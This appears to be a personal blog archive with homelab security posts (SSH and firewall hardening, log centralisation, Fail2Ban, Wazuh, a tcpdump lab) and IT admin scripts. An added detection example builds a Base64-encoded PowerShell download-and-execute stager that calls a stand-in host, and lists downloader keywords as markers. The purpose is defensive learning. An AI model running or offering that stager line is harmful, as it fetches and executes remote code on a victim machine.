djo was right. get back to your heart. but only if you give it back again
Gonna talk about heavy stuff and what's happening around the fucked-up world right now;
Scrolling through the tag #PutinHitler on Twitter, seeing a mother with her child at a protest, a Russian man apologizing for his president's doing, many Russian soldiers abandoning their vehicles and their army clothes, the Ukrainian soldiers on Snake Island in the Black Sea who chose to fight and die rather than surrender, their words being "Well, this is it." to their fellow soldiers and then "Go fuck yourself" to the Russian soldiers, 18-year-old Ukrainians being forced onto the front lines to fight for their homeland, and the president, Mr. Zelensky, who rather than evacuating chose to stay and fight alongside his people.
Week 3-4 Centralized Logging and SIEM Installation & First Alerts
My next focus was to centralize all logs on my Ubuntu Server and begin building out my security monitoring environment using Wazuh as my SIEM. I also planned to create a few test users and deploy a Kali Linux machine to simulate attack activity.
I built a new VM and installed Ubuntu Desktop, enabling SSH logging and configuring the firewall. On the Ubuntu Server, I created a separate non-root user account following the principle of least privilege. I then allowed SSH access through the firewall on port 22, but only from the IP address of the Ubuntu Desktop machine.
To start, I created a new standard user to serve as my baseline active user. This user was assigned to the Ubuntu Desktop VM and represents a normal, non-administrative user interacting with the environment.
Next, I set up a Kali Linux VM and updated all installed packages. From Kali, I attempted to SSH into the Ubuntu Server. The connection was denied because the firewall rules restrict access to the trusted desktop's IP only. I checked the Ubuntu Server logs and confirmed that the attempted connection was detected and logged, including the source IP, which matched the Kali machine.
The goal was to monitor that user's activity, capture both successful and failed login attempts, and observe how the system logged and responded to these events.
I then added a firewall rule allowing the Ubuntu Desktop's IP address to reach the server on port 514 (syslog), and set up a configuration file on the desktop to forward all of its logs to the Ubuntu Server.
Then I did the same on the Kali machine, except for allowing SSH from it, so that I could monitor its activity as well.
I then checked that the logs were arriving on the Ubuntu Server and could see that both the Kali and the Ubuntu Desktop logs were being received.
Once everything was configured, I logged into the server from the desktop user and reviewed the logs to confirm the successful authentication. After that, I intentionally entered an incorrect password multiple times to generate failed login events. As expected, Fail2Ban triggered after five failed attempts and temporarily blocked further SSH attempts from that IP. (With MaxAuthTries set to 3 in sshd_config, the server drops a session after three wrong passwords, so reaching five failures takes more than one connection; Fail2Ban counts across connections.) I reviewed the logs to verify that both the failed logins and the Fail2Ban action were properly recorded and centralized.
This setup let me validate that my firewall, authentication logging, and centralized log monitoring were working as intended before moving on to the Wazuh integration. I then installed the Wazuh Manager on my Ubuntu Server, put a Wazuh Agent on the Ubuntu Desktop and on Kali, and soon they were reporting events happening in my lab.
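To check that the centralized logs actually show what the write-up describes (one successful login, repeated failures from a single source, and Fail2Ban's ban), here is an added example that is not code from the original post. It parses constructed auth.log and fail2ban.log lines in the format Ubuntu's sshd and Fail2Ban write; hostnames, users and addresses are invented, and the maxretry value of 5 is an assumption about the jail. On the log server the same functions would be fed the forwarded copies of the two files.

```python
"""Correlate SSH failures in auth.log with Fail2Ban's Ban lines.

Added example, not part of the original post. The sample lines are
constructed in the syslog format used by Ubuntu's sshd and by Fail2Ban.
"""
import re
from collections import defaultdict

# Assumed jail setting (Fail2Ban's default for the sshd jail is also 5).
MAXRETRY = 5

FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2"
)
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>password|publickey) for (?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2"
)
BAN_RE = re.compile(r"fail2ban\.actions\s+\[\d+\]: NOTICE\s+\[sshd\] Ban (?P<ip>[\d.]+)")


def summarize_auth(lines):
    """Return (failures_by_ip, accepted) from auth.log lines.

    failures_by_ip: ip -> number of "Failed password" events
    accepted:       list of (ip, user, method) for successful logins
    """
    failures = defaultdict(int)
    accepted = []
    for line in lines:
        if m := FAILED_RE.search(line):
            failures[m["ip"]] += 1
        elif m := ACCEPTED_RE.search(line):
            accepted.append((m["ip"], m["user"], m["method"]))
    return dict(failures), accepted


def banned_ips(lines):
    """Set of IPs that Fail2Ban reports banning in fail2ban.log lines."""
    return {m["ip"] for line in lines if (m := BAN_RE.search(line))}


def unbanned_bruteforcers(auth_lines, f2b_lines, maxretry=MAXRETRY):
    """IPs that reached the retry threshold but never show up in a Ban line.

    Empty result: the jail fired for every source that should have tripped it.
    Non-empty: the jail, the log path, or the log forwarding needs a look.
    """
    failures, _ = summarize_auth(auth_lines)
    bans = banned_ips(f2b_lines)
    return sorted(ip for ip, n in failures.items() if n >= maxretry and ip not in bans)


# Constructed sample (fictional hosts and addresses). Note how the first source
# needs two connections (pids 1215 and 1220) to reach five failures, because
# sshd drops each session after MaxAuthTries wrong passwords.
AUTH_SAMPLE = """\
Mar  3 10:01:02 ubuntu-server sshd[1201]: Accepted password for labuser from 192.168.56.20 port 51002 ssh2
Mar  3 10:02:10 ubuntu-server sshd[1215]: Failed password for labuser from 192.168.56.20 port 51010 ssh2
Mar  3 10:02:12 ubuntu-server sshd[1215]: Failed password for labuser from 192.168.56.20 port 51010 ssh2
Mar  3 10:02:14 ubuntu-server sshd[1215]: Failed password for labuser from 192.168.56.20 port 51010 ssh2
Mar  3 10:02:20 ubuntu-server sshd[1220]: Failed password for labuser from 192.168.56.20 port 51011 ssh2
Mar  3 10:02:22 ubuntu-server sshd[1220]: Failed password for labuser from 192.168.56.20 port 51011 ssh2
Mar  3 10:05:00 ubuntu-server sshd[1230]: Failed password for invalid user admin from 192.168.56.30 port 40001 ssh2
Mar  3 10:05:01 ubuntu-server sshd[1230]: Failed password for invalid user admin from 192.168.56.30 port 40001 ssh2
Mar  3 10:05:02 ubuntu-server sshd[1230]: Failed password for invalid user admin from 192.168.56.30 port 40001 ssh2
Mar  3 10:05:05 ubuntu-server sshd[1231]: Failed password for invalid user admin from 192.168.56.30 port 40002 ssh2
Mar  3 10:05:06 ubuntu-server sshd[1231]: Failed password for invalid user admin from 192.168.56.30 port 40002 ssh2
""".splitlines()

F2B_SAMPLE = """\
2024-03-03 10:02:23,118 fail2ban.filter  [900]: INFO    [sshd] Found 192.168.56.20 - 2024-03-03 10:02:22
2024-03-03 10:02:23,412 fail2ban.actions [900]: NOTICE  [sshd] Ban 192.168.56.20
""".splitlines()

if __name__ == "__main__":
    failures, accepted = summarize_auth(AUTH_SAMPLE)
    print("successful logins:", accepted)
    print("failures per source IP:", failures)
    print("banned by Fail2Ban:", banned_ips(F2B_SAMPLE))
    print("reached threshold but not banned:", unbanned_bruteforcers(AUTH_SAMPLE, F2B_SAMPLE))
```

In the sample the second source (192.168.56.30) reaches the threshold with no matching Ban line, which is exactly the condition worth alerting on once the logs are centralized. The forwarding itself is a one-line rsyslog rule in a file under /etc/rsyslog.d/ on each client, `*.* @@<server-ip>:514` for TCP or a single `@` for UDP; plain syslog on 514 is neither authenticated nor encrypted, which is acceptable in an isolated lab but not across a real network.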
Next, I will be working on MITRE ATT&CK mapping, with more to come.
Cyberlab Setup Week 1 - 2
I know it has been forever since I have written anything here, but I am finally back at it. I now have a lab and have been going through the setup process: making my own virtual network and running my lab. So let's start with the first week.
I built an Ubuntu Server VM and began to harden it.
I started by installing VirtualBox and booting the Ubuntu Server ISO in my lab.
After booting the Ubuntu Server, I set up the first admin user, then began upgrading packages and learning the ins and outs of the server.
1. SSH login user rules
Then I set up SSH, establishing rules for logging in and applying least privilege to the user.
I did this by editing /etc/ssh/sshd_config (keywords are case-insensitive, but each keyword must be written as one word):
PermitRootLogin no
PasswordAuthentication yes
PubkeyAuthentication yes
MaxAuthTries 3
LoginGraceTime 30
Then I just restarted the SSH service. PasswordAuthentication yes is the weak setting here; once a key pair is in place for the user it should be set to no so that only key-based logins are accepted.
I made a non-root user and assigned them a password.
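As an added check that is not part of the original write-up, the script below audits an sshd_config against the values above. It implements the sshd parsing rules that matter in a hardening review: keywords are case-insensitive, the first occurrence of a keyword wins, and directives under a Match block apply only to matching connections. The sample config, the OpenSSH defaults table and the BASELINE dictionary are mine.

```python
"""Audit an sshd_config against a hardening baseline.

Added example, not code from the original post. Parses sshd's
"Keyword value" / "Keyword=value" format with sshd's own precedence rule
(first occurrence wins) and keeps Match-block settings separate.
"""
import re

# The global values the hardening step above sets (the post's baseline).
BASELINE = {
    "permitrootlogin": "no",
    "passwordauthentication": "yes",   # the weak one: flip to "no" once keys are deployed
    "pubkeyauthentication": "yes",
    "maxauthtries": "3",
    "logingracetime": "30",
}

# OpenSSH's compiled-in defaults for the same keywords; used when a keyword is absent.
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
    "maxauthtries": "6",
    "logingracetime": "120",
}

# "Keyword value" or "Keyword=value"; sshd accepts either separator.
DIRECTIVE = re.compile(r"^(\S+?)(?:\s*=\s*|\s+)(.*)$")


def parse_sshd_config(text):
    """Parse sshd_config text into (global_settings, match_blocks).

    global_settings: lowercased keyword -> value; the FIRST occurrence wins,
                     exactly as sshd resolves duplicates.
    match_blocks:    list of (match_criteria, {keyword: value}) in file order;
                     these apply only to connections matching the criteria.
    """
    global_settings = {}
    match_blocks = []
    current = None  # None while outside any Match block
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = DIRECTIVE.match(line)
        key, value = (m.group(1).lower(), m.group(2).strip()) if m else (line.lower(), "")
        if key == "match":
            current = {}
            match_blocks.append((value, current))
            continue
        target = global_settings if current is None else current
        target.setdefault(key, value)  # keep the first value seen
    return global_settings, match_blocks


def audit(text, baseline=BASELINE):
    """Return {keyword: (effective_value, expected_value, ok)} for the global scope."""
    global_settings, _ = parse_sshd_config(text)
    report = {}
    for key, expected in baseline.items():
        effective = global_settings.get(key, DEFAULTS[key]).lower()
        report[key] = (effective, expected, effective == expected.lower())
    return report


def findings(text, baseline=BASELINE):
    """Keywords whose effective global value deviates from the baseline, sorted."""
    return sorted(k for k, (_, _, ok) in audit(text, baseline).items() if not ok)


# Constructed sample: the post's directives, a later duplicate that sshd ignores,
# and a Match block whose setting must not be read as global.
SAMPLE = """\
# hardened by hand
PermitRootLogin no
PasswordAuthentication yes
PubkeyAuthentication yes
MaxAuthTries 3
LoginGraceTime 30
# a second MaxAuthTries lower down is ignored: first occurrence wins
MaxAuthTries 6

Match Address 10.0.0.0/8
    PasswordAuthentication no
"""

if __name__ == "__main__":
    for key, (effective, expected, ok) in audit(SAMPLE).items():
        print(f"{'OK ' if ok else 'BAD'} {key:<23} effective={effective} expected={expected}")
    print("deviations:", findings(SAMPLE))
```

To audit the real file, read /etc/ssh/sshd_config into `audit()`. On Ubuntu the shipped file starts with `Include /etc/ssh/sshd_config.d/*.conf`, and because the first occurrence wins, a drop-in there (cloud-init often places one that sets PasswordAuthentication) overrides anything written lower in the main file; this parser does not follow Include lines. `sudo sshd -T` prints the effective values sshd actually uses and is the final word.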
2. Firewall access
Moving on to UFW (Uncomplicated Firewall), I wanted to isolate my network as much as possible.
First, I set the defaults to deny all incoming and allow all outgoing traffic.
Then I allowed inbound access on port 1999, the port I reserved for when I install Netdata (Netdata's default is 19999, so the rule has to match whatever port Netdata is configured to listen on).
I then allowed connections from my main lab machine to the other services I use for remote access, but kept them restricted to that source.
3. Install automatic security updates
Patch fatigue is a real problem and things get missed, so setting up automation is key.
I installed unattended-upgrades, enabled it, and verified the config files.
4. Basic audit and verification
I then went back and did some basic verification:
Checked that the services were running.
Checked and made notes about the current users.
Finally, checked the auth logs.
This was the end of my first week. I am trying to work at least a few hours a week on my lab.
Cyberlab Fail2Ban & Netdata Install
Installed Fail2Ban
I installed Fail2Ban and made sure it was running.
Then I made a new jail.local file for Fail2Ban (local overrides belong there rather than in jail.conf, which package upgrades replace).
Installed Netdata
I installed Netdata so I would have a GUI to watch the data as it moves through my system.
After everything was installed successfully, I logged into the Netdata web interface and ran a stress test.
New PowerShell Program
So the other day I was at work and was wondering if there was a way to check all the PCs on the network and find out when each was last active.
I then began to write something in PowerShell. I also wanted the computer name and the user logged into the PC, just to make a list of older PCs on the network and users we need to clean up in AD.
Using AD, I could get most of the information I needed (the LastLogonTimestamp attribute, which is only refreshed when it is more than 14 days stale, so it is good for finding old machines but not for exact last-activity times). The script pings each PC and, if it answers, queries it over CIM (WMI) for the logged-on user and hardware model. Note that Win32_ComputerSystem.UserName is the user currently logged on interactively, so a machine with nobody at the console reports no user. I also wanted the results in a spreadsheet to send to the sysadmins.
To use this, run PowerShell as an administrator on a machine with the ActiveDirectory module (RSAT) installed; the spreadsheet export needs the ImportExcel module (Install-Module ImportExcel).
Here is the code:
# Requires the ActiveDirectory module (RSAT) and, for Export-Excel, the ImportExcel module
Import-Module ActiveDirectory

$computers = Get-ADComputer -Filter * -Property Name, LastLogonTimestamp
$results = @()

foreach ($computer in $computers) {
    $compName = $computer.Name

    # LastLogonTimestamp is a FILETIME; it is null for machines that never logged on
    $lastLogon = if ($computer.LastLogonTimestamp) {
        [DateTime]::FromFileTime($computer.LastLogonTimestamp)
    } else { $null }

    Write-Host "Checking $compName..." -ForegroundColor Cyan

    # Reset per machine so values from the previous loop iteration do not leak through
    $lastUser = "Unknown or Offline"
    $model    = "Unknown"

    # Try to ping and connect if the machine is online
    if (Test-Connection -ComputerName $compName -Count 1 -Quiet) {
        try {
            # Query over CIM (WMI). -ErrorAction Stop turns a failed query into a
            # terminating error so the catch block actually runs
            $sysInfo  = Get-CimInstance -ClassName Win32_ComputerSystem -ComputerName $compName -ErrorAction Stop
            # UserName is the currently logged-on interactive user (null if nobody is logged on)
            $lastUser = if ($sysInfo.UserName) { $sysInfo.UserName } else { "No interactive user" }
            $model    = $sysInfo.Model
        } catch {
            $lastUser = "Access Denied"
        }
    } else {
        $lastUser = "Offline"
    }

    $results += [PSCustomObject]@{
        ComputerName     = $compName
        LastLogonToAD    = $lastLogon
        LastLoggedInUser = $lastUser
        SystemModel      = $model
    }
}

# Display
$results | Sort-Object LastLogonToAD -Descending | Format-Table -AutoSize

# Optional: export to an Excel workbook on the desktop (needs the ImportExcel module)
$desktop = [Environment]::GetFolderPath("Desktop")
$path    = Join-Path -Path $desktop -ChildPath "PC_LastLogonAndUser.xlsx"
$results | Export-Excel -Path $path -AutoSize -BoldTopRow -Title "PC Last Logon and User Report" -WorksheetName "Report"
SOC TCP Dump Lab
Lately I have been playing with tcpdump. I prefer Wireshark when it comes to monitoring network traffic with a packet sniffer, but a person in IT cybersecurity should be able to work with multiple tools.
tcpdump ships with Kali Linux and is used to capture and inspect traffic on a network. It is used by SOC personnel and attackers alike.
This lab was created by Black Hills Information Security (BHIS), a company that not only offers cybersecurity services but also has a love for teaching and offers many pay-what-you-can classes. I will link their site. This set of labs is part of the SOC entry-level class.
Let's look at the lab.
I started by getting root, then running tcpdump. This is what showed up first.
Looking at the output, I can see the timestamp, the protocol, and the source and destination IP addresses and ports. Most of this is very useful when you are trying to spot anything out of the ordinary on your network.
Next I filtered on port 80 (HTTP). Almost every network allows outbound HTTP, so threat actors commonly use it to deliver payloads and for malware to call home, because the traffic blends in with normal browsing.
The command I used was tcpdump -n -r magnitude_1hr.pcap host 192.168.99.52 and port 80 (-r reads from the saved capture file rather than a live interface, and -n turns off name resolution so the addresses stay as numbers),
and this is all the information that came up.
When I saw this I really felt overwhelmed. There is a lot being thrown at you, and by default tcpdump only prints the packet headers, so the data looks like noise, but you can pick out some information, such as the HTTP requests and the IP addresses.
Next I added -A to print each packet's payload as ASCII: tcpdump -n -r magnitude_1hr.pcap host 192.168.99.52 and port 80 -A
This did not decrypt anything (traffic on port 80 is plaintext HTTP); it just rendered the payload bytes as text so I could read through the data, and I noticed a few things.
It looks like something is running PowerShell (the $ variable prefixes are a giveaway). PowerShell is not normally something you would expect to see in web traffic to an average user's PC, maybe for IT staff, but I would not be too sure about that. What really made me think was when I saw the Base64.
At first, I will confess, I had no clue what Base64 is or what it is used for, so I had to do some googling. Base64 encodes binary data as printable text. So I had to ask myself, "What does that mean?" Looking deeper, it is used to transport binary over protocols that can only carry text. In this context it lets an attacker hide a script inside a web response, or hand an entire command to powershell.exe with -EncodedCommand, so that nothing readable as code is visible at a glance.
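The detection the lab points toward, as an added example that is not part of the BHIS lab or the original post: scan text as `tcpdump -A` prints it for long Base64 runs, decode them, and flag the ones that turn out to be PowerShell. The HTTP exchange below is constructed (the host 192.0.2.10, the paths and the scripts are invented), and the marker list is mine. Two encodings matter in practice: `powershell -EncodedCommand` takes Base64 of UTF-16LE text, while blobs passed to `[Convert]::FromBase64String` inside a script are usually ASCII/UTF-8, so both decodings are tried.

```python
"""Find Base64-encoded PowerShell in plaintext HTTP payloads (tcpdump -A style).

Added example, not from the lab or the original post. Sample payload is
constructed; addresses are from the TEST-NET-1 documentation range.
"""
import base64
import binascii
import re

# Long runs of Base64 alphabet characters with optional '=' padding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# PowerShell constructs typical of downloaders and stagers (case-insensitive match).
PS_MARKERS = (
    "powershell", "-enc", "-encodedcommand", "iex", "invoke-expression",
    "downloadstring", "new-object net.webclient", "frombase64string",
    "-nop", "-w hidden", "bypass",
)


def decode_candidates(blob):
    """Return [(encoding, text)] for every decoding of blob that is valid text.

    UTF-16LE is what -EncodedCommand uses; UTF-8 covers script-embedded blobs.
    A blob that is not valid Base64 yields an empty list.
    """
    padded = blob + "=" * (-len(blob) % 4)
    try:
        raw = base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return []
    out = []
    for enc in ("utf-16-le", "utf-8"):
        try:
            out.append((enc, raw.decode(enc)))
        except UnicodeDecodeError:
            pass  # odd length for UTF-16, or invalid byte sequences for UTF-8
    return out


def powershell_markers(text):
    """PowerShell markers present in text, in PS_MARKERS order."""
    low = text.lower()
    return [m for m in PS_MARKERS if m in low]


def scan_payload(text):
    """Scan payload text; return [(kind, encoding, markers)].

    kind is 'plaintext-powershell' when markers are visible as-is, or
    'base64-powershell' when they only appear after decoding a blob
    (encoding names which decoding exposed them).
    """
    findings = []
    visible = powershell_markers(text)
    if visible:
        findings.append(("plaintext-powershell", None, visible))
    for blob in B64_RUN.findall(text):
        for enc, inner in decode_candidates(blob):
            hits = powershell_markers(inner)
            if hits:
                findings.append(("base64-powershell", enc, hits))
    return findings


# Constructed sample of what tcpdump -A might show for a response carrying a stager.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage2.ps1')"
_ENC_CMD = base64.b64encode(_STAGER.encode("utf-16-le")).decode("ascii")      # -enc form
_SCRIPT = "$w = New-Object Net.WebClient; IEX $w.DownloadString('http://192.0.2.10/a.ps1')"
_ENC_SCRIPT = base64.b64encode(_SCRIPT.encode("utf-8")).decode("ascii")       # FromBase64String form
_NOISE = base64.b64encode(b"\x89PNG\r\n\x1a\n" * 6).decode("ascii")          # binary, no script

SAMPLE_PAYLOAD = f"""\
GET /update.txt HTTP/1.1
Host: 192.0.2.10
User-Agent: Mozilla/5.0

HTTP/1.1 200 OK
Content-Type: text/plain

cmd /c start /b powershell -nop -w hidden -enc {_ENC_CMD}
$s=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{_ENC_SCRIPT}'))
X-Image: {_NOISE}
"""

if __name__ == "__main__":
    for kind, enc, hits in scan_payload(SAMPLE_PAYLOAD):
        print(f"{kind:<22} {enc or '-':<10} {hits}")
```

The image-like blob decodes but contains no markers, so it produces no finding; only the two script blobs do. On a real capture, a payload split across TCP segments will split a Base64 run across packets, so reassemble the stream first (Wireshark's Follow TCP Stream, or tcpflow) before scanning.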
This is just a small lab, and digging deeper into it would be out of scope. It is only a place to get some hands-on experience with tcpdump. There will be more to come as I finish more of the labs in the class.
Some programs I have created and use.
File Scanner
This program is a scanner that searches a server (or any directory tree) for old files. I set it up to look for files over 7 years old and compile them into an Excel file so they can be reviewed before deletion. It is useful for file retention policies, and for finding the information hoarders.
The program asks for a folder path, then asks where you want to store the Excel file.
import os
import datetime
import tkinter as tk
from tkinter import filedialog
from openpyxl import Workbook  # pip install openpyxl


def get_file_creation_time(file_path):
    """Get the creation time of a file.

    Note: os.path.getctime is the creation time on Windows, but on Linux and
    macOS it is the inode change time (last metadata change), not creation.
    """
    print("File path:", file_path)  # Debug print
    try:
        return datetime.datetime.fromtimestamp(os.path.getctime(file_path))
    except OSError as e:
        print("Error:", e)  # Debug print
        return None


def get_file_size(file_path):
    """Get the size of a file in bytes."""
    return os.path.getsize(file_path)


def list_old_files(folder_path, output_directory):
    """List files older than 7 years in a folder and store their information in an Excel file."""
    # Initialize Excel workbook
    wb = Workbook()
    ws = wb.active
    ws.append(["File Name", "File Path", "Creation Date", "Size (bytes)"])

    # Get current date
    current_date = datetime.datetime.now()

    # Traverse through files in the folder
    for root, dirs, files in os.walk(folder_path):
        for file in files:
            file_path = os.path.join(root, file)
            creation_time = get_file_creation_time(file_path)
            if creation_time is None:
                continue  # Skip files whose timestamp could not be retrieved

            file_age = current_date - creation_time
            if file_age.days > 7 * 365:  # Check if file is older than 7 years
                file_size = get_file_size(file_path)
                ws.append([file, file_path, creation_time.strftime('%Y-%m-%d %H:%M:%S'), file_size])

    # Save Excel file to the specified directory
    output_excel = os.path.join(output_directory, "old_files.xlsx")
    wb.save(output_excel)
    print("Old files listed and saved to", output_excel)


if __name__ == "__main__":
    # Initialize Tkinter and hide the main window
    root = tk.Tk()
    root.withdraw()

    # Ask for folder path
    folder_path = filedialog.askdirectory(title="Select Folder")

    # Ask for output directory
    output_directory = filedialog.askdirectory(title="Select Output Directory")

    list_old_files(folder_path, output_directory)
------------------------------------------------------------------------------
Older file Scanner and Delete
Working in IT, you will find that users fill up the space on the servers with old files.
This is especially true in industries with document retention policies, where you cannot keep some documents longer than a certain amount of time, or where you simply have hoarders on your network. You know the people who never delete anything and save everything.
So I wrote a program that searches a selected server share, finds files older than seven years and empty folders, lists them, and deletes them after you confirm.
import os
import datetime
import tkinter as tk
from tkinter import filedialog


def list_files_and_empty_folders_to_delete(folder_path):
    # Get the current date and the cutoff date seven years ago
    current_date = datetime.datetime.now()
    seven_years_ago = current_date - datetime.timedelta(days=7 * 365)

    files_to_delete = []
    empty_folders_to_delete = []

    # Iterate over files and folders recursively, bottom-up so children are seen before parents
    for root, dirs, files in os.walk(folder_path, topdown=False):
        # Collect files older than seven years, judged by last-modified time
        # (a backup or AV tool that rewrites files can reset this, so review the list first)
        for file_name in files:
            file_path = os.path.join(root, file_name)
            file_modified_time = datetime.datetime.fromtimestamp(os.path.getmtime(file_path))
            if file_modified_time < seven_years_ago:
                files_to_delete.append(file_path)

        # Collect folders that are already empty
        for dir_name in dirs:
            dir_path = os.path.join(root, dir_name)
            if not os.listdir(dir_path):  # Check if directory is empty
                empty_folders_to_delete.append(dir_path)

    return files_to_delete, empty_folders_to_delete


def delete_files_and_empty_folders(files_to_delete, empty_folders_to_delete):
    # Print files to be deleted
    print("Files to be deleted:")
    for file_path in files_to_delete:
        print(file_path)

    # Print empty folders to be deleted
    print("\nEmpty folders to be deleted:")
    for folder_path in empty_folders_to_delete:
        print(folder_path)

    # Confirmation before deletion
    confirmation = input("\nDo you want to proceed with the deletion? (yes/no): ")
    if confirmation.lower() == "yes":
        # Delete files
        for file_path in files_to_delete:
            os.remove(file_path)
            print(f"Deleted file: {file_path}")

        # Delete empty folders (folders emptied by the file deletions above are
        # not included; run the program again to pick those up)
        for folder_path in empty_folders_to_delete:
            os.rmdir(folder_path)
            print(f"Deleted empty folder: {folder_path}")
    else:
        print("Deletion canceled.")


def get_folder_path():
    root = tk.Tk()
    root.withdraw()  # Hide the main window
    folder_path = filedialog.askdirectory(title="Select Folder")
    return folder_path


if __name__ == "__main__":
    # Ask for the folder path using a dialog box
    folder_path = get_folder_path()

    # Check if the folder path is provided
    if folder_path:
        # List files and empty folders to be deleted, then delete if confirmed
        files_to_delete, empty_folders_to_delete = list_files_and_empty_folders_to_delete(folder_path)
        delete_files_and_empty_folders(files_to_delete, empty_folders_to_delete)
    else:
        print("No folder path provided.")
______________________________________________________________
Batch File Mod
This program is for when you need to modify batch files in bulk. Anyone in IT who has had to manage batch files for a large company knows how annoying it is to go through each one to make a single-line change.
This program searches all the .bat files under a directory for a line containing text you enter and, after asking you to confirm for each file, removes that line.
import os


def find_files_with_text(directory_path, text_to_find):
    """Return the paths of all .bat files under directory_path containing text_to_find."""
    files_with_text = []
    for root, _, files in os.walk(directory_path):
        for file_name in files:
            if file_name.endswith('.bat'):
                file_path = os.path.join(root, file_name)
                with open(file_path, 'r') as file:
                    if any(text_to_find in line for line in file):
                        files_with_text.append(file_path)
    return files_with_text


def remove_line_from_file(file_path, text_to_remove):
    """Rewrite file_path in place without the lines that contain text_to_remove.

    Note: the file is truncated and rewritten directly, so an interruption
    between the two open() calls would leave it incomplete.
    """
    try:
        with open(file_path, 'r') as file:
            lines = file.readlines()

        with open(file_path, 'w') as file:
            for line in lines:
                if text_to_remove not in line:
                    file.write(line)

        print(f"Removed lines containing '{text_to_remove}' from {file_path}.")

    except FileNotFoundError:
        print(f"Error: The file {file_path} does not exist.")
    except Exception as e:
        print(f"An error occurred: {e}")


def process_directory(directory_path, text_to_remove):
    files_with_text = find_files_with_text(directory_path, text_to_remove)

    if not files_with_text:
        print(f"No files found containing the text '{text_to_remove}'.")
        return

    for file_path in files_with_text:
        print(f"Found '{text_to_remove}' in {file_path}")
        user_input = input(
            f"Do you want to remove the line containing '{text_to_remove}' from {file_path}? (yes/no): "
        ).strip().lower()
        if user_input == 'yes':
            remove_line_from_file(file_path, text_to_remove)
        else:
            print(f"Skipped {file_path}.")


if __name__ == "__main__":
    directory_path = input("Enter the path to the directory containing batch files: ")
    text_to_remove = input("Enter the text to remove: ")
    process_directory(directory_path, text_to_remove)
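Bulk-editing logon scripts is exactly the kind of operation that should never leave a half-written .bat behind, so here is an added variant, not the original program, that does a line replacement instead of a removal and writes each file atomically: the file is read as bytes (so CRLF endings and the code page survive), a `.bak` copy is kept, and the new content goes to a temporary file that `os.replace` swaps into place. The function names and the dry-run flag are mine.

```python
"""Replace a matching line in every .bat file under a directory, atomically.

Added example, not the program above. Works on bytes so line endings and
the file's encoding are preserved; each file is backed up and swapped in
with os.replace.
"""
import os
import tempfile


def replace_lines(data, needle, replacement):
    """Return (new_bytes, count): every line containing needle becomes replacement.

    The original line ending of each replaced line is kept.
    """
    out = []
    count = 0
    for line in data.splitlines(keepends=True):
        body = line.rstrip(b"\r\n")
        ending = line[len(body):]
        if needle in body:
            out.append(replacement + ending)
            count += 1
        else:
            out.append(line)
    return b"".join(out), count


def rewrite_bat(path, needle, replacement):
    """Apply replace_lines to one file atomically; returns the number of lines changed."""
    with open(path, "rb") as f:
        data = f.read()
    new_data, count = replace_lines(data, needle, replacement)
    if count == 0:
        return 0
    # Keep a backup, then write a temp file in the same directory and swap it in.
    # os.replace is atomic on POSIX and NTFS, so a crash leaves old or new, never a mix.
    with open(path + ".bak", "wb") as f:
        f.write(data)
    fd, tmp = tempfile.mkstemp(dir=os.path.dirname(path) or ".", suffix=".tmp")
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(new_data)
        os.replace(tmp, path)
    except BaseException:
        if os.path.exists(tmp):
            os.unlink(tmp)
        raise
    return count


def process_directory(directory, needle, replacement, dry_run=True):
    """Walk directory for .bat files; returns {path: changed_line_count}.

    With dry_run=True nothing is written, so the affected files can be
    reviewed before the real run.
    """
    changed = {}
    for root, _, files in os.walk(directory):
        for name in files:
            if not name.lower().endswith(".bat"):
                continue
            path = os.path.join(root, name)
            if dry_run:
                with open(path, "rb") as f:
                    _, count = replace_lines(f.read(), needle, replacement)
            else:
                count = rewrite_bat(path, needle, replacement)
            if count:
                changed[path] = count
    return changed


if __name__ == "__main__":
    directory = input("Directory containing batch files: ")
    old = input("Text identifying the line to replace: ").encode()
    new = input("Replacement line: ").encode()
    preview = process_directory(directory, old, new, dry_run=True)
    for path, n in preview.items():
        print(f"{path}: {n} line(s) would change")
    if preview and input("Apply? (yes/no): ").strip().lower() == "yes":
        print(process_directory(directory, old, new, dry_run=False))
```

Run it once with the default dry run to see which files would change, then apply. The `.bak` files are the rollback path if the replacement line turns out to be wrong.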